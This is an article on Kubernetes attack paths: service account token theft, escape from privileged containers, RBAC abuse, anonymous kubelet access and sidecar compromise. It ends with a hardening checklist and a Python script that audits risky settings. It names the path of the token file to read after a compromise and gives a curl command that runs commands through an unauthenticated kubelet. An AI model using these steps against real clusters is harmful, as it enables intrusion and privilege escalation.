Kubernetes (K8s) has won the container war. It powers 80% of modern cloud infrastructure. But K8s is notoriously complex to secure. It has an API server, internal networking, overlay DNS, and a permission system (RBAC) that is easy to misconfigure. For an attacker, a compromised container is just the beginning. The goal is Cluster Admin.
Architecture Overview
1. Master Node (Control Plane): The brain. Runs the API Server (TCP 6443), Etcd (Database), and Scheduler.
2. Worker Nodes: The muscle. They run the actual Pods (applications).
3. Kubelet: The agent on every worker node that talks to the Master.
4. Sidecars: Helper containers running alongside the main app.
1. The Token Steal (Lateral Movement)
Every Pod needs to talk to the K8s API sometimes (e.g., to find other services). By default, K8s mounts a "Service Account Token" into every pod.
Path: `/var/run/secrets/kubernetes.io/serviceaccount/token`
If you compromise a web app (via RCE or SQLi), your first move is to read this file.
2. Pod Breakout (Container Escape)
You are root inside the container, but you want to be root on the Host Node.
Privileged Containers: The most common vulnerability. If a pod has `securityContext.privileged: true`, it has access to the host's devices.
Exploit (The Mount trick):
You can mount the Host's hard drive into your container.
3. RBAC Abuse (Role-Based Access Control)
K8s uses Roles and RoleBindings. Some permissions are dangerous:
- pods/create: The ability to create a pod is equivalent to Root. Why? Because you can create a privileged pod that mounts the root filesystem (see above).
- secrets/get: Read any secret (DB Passwords, AWS Keys).
- daemonsets/create: Run code on EVERY node in the cluster.
4. Misconfigured Kubelets (Anonymous Access)
The Kubelet runs on port 10250.
By default, it requires authentication. But often, admins misconfigure it to allow Anonymous Authentication.
If you find port 10250 open and unauthenticated, you can run commands on that node without credentials.
`curl -k https://target-node:10250/run/namespace/pod/container -d "cmd=id"`
5. Sidecar Injection
Service Meshes like Istio or Linkerd inject a "Sidecar" proxy (Envoy) into every pod.
If you compromise the sidecar configuration, you can intercept all traffic entering or leaving the pod, including traffic the mesh protects with mTLS.
Hardening Checklist
1. Disable Automounting: `automountServiceAccountToken: false` in PodSpecs. Only mount it where needed.
2. Network Policies: Default Deny. Only allow whitelisted traffic (Web -> DB).
3. Pod Security Standards (PSS): Block `privileged` mode at the cluster level.
4. Scan Images: Use tools like Trivy or Clair in your CI/CD pipeline to catch vulnerabilities before deployment.
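The checklist can be checked against exported cluster objects. The Python below is an added example, not part of the original article: it flags the settings this page names (privileged containers, pod specs that do not disable token automounting, and roles granting pods/create, secrets/get or daemonsets/create) in a constructed sample shaped like `kubectl get pods,roles,clusterroles -A -o json` output. It assumes that JSON shape, and it ignores apiGroups and ServiceAccount-level automount settings, so it can over-report.

```python
import json

# Constructed sample, shaped like `kubectl get pods,roles,clusterroles -A -o json`.
SAMPLE = json.loads("""
{"items": [
 {"kind": "Pod", "metadata": {"namespace": "shop", "name": "web"},
  "spec": {"containers": [{"name": "app", "securityContext": {"privileged": true}}]}},
 {"kind": "Pod", "metadata": {"namespace": "shop", "name": "db"},
  "spec": {"automountServiceAccountToken": false,
           "containers": [{"name": "pg"}]}},
 {"kind": "Role", "metadata": {"namespace": "shop", "name": "ci"},
  "rules": [{"apiGroups": ["", "apps"], "resources": ["pods", "daemonsets"],
             "verbs": ["create", "list"]}]},
 {"kind": "ClusterRole", "metadata": {"name": "ops"},
  "rules": [{"apiGroups": [""], "resources": ["*"], "verbs": ["get"]}]}
]}
""")

# (resource, verb) pairs the article calls dangerous.
RISKY = {("pods", "create"), ("secrets", "get"), ("daemonsets", "create")}

def audit(items):
    """Return sorted (object, finding) tuples for the settings named above."""
    findings = set()
    for obj in items:
        meta = obj.get("metadata", {})
        ref = f'{obj.get("kind")}/{meta.get("namespace", "-")}/{meta.get("name")}'
        if obj.get("kind") == "Pod":
            spec = obj.get("spec", {})
            # Pod-level field only; a ServiceAccount can also disable automounting.
            if spec.get("automountServiceAccountToken") is not False:
                findings.add((ref, "token-automount"))
            for c in spec.get("containers", []) + spec.get("initContainers", []):
                if (c.get("securityContext") or {}).get("privileged") is True:
                    findings.add((ref, f"privileged:{c.get('name')}"))
        elif obj.get("kind") in ("Role", "ClusterRole"):
            for rule in obj.get("rules") or []:
                for res, verb in RISKY:
                    # "*" in a rule matches every resource or every verb.
                    if ({res, "*"} & set(rule.get("resources", [])) and
                            {verb, "*"} & set(rule.get("verbs", []))):
                        findings.add((ref, f"rbac:{res}/{verb}"))
    return sorted(findings)

if __name__ == "__main__":
    for ref, finding in audit(SAMPLE["items"]):
        print(f"{ref}: {finding}")
```

Run against real exports in CI or on a schedule and treat any finding as something that needs a documented exception.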